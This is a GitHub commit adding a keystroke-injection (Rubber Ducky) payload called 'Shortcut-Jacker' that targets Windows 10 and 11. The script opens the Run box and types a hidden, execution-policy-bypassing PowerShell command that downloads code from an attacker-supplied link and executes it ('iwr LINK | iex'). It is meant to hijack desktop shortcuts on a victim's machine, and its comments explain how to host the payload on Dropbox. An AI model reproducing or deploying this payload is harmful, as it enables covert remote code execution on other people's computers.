Add files via upload

This commit is contained in:
I-Am-Jakoby 2022-12-15 23:29:34 -06:00 committed by GitHub
parent 837d7c06e7
commit 6ffe801908
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
3 changed files with 272 additions and 0 deletions

View file

@ -0,0 +1,10 @@
REM Title: Shortcut-Jacker
REM Author: I am Jakoby
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass iwr LINK | iex
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly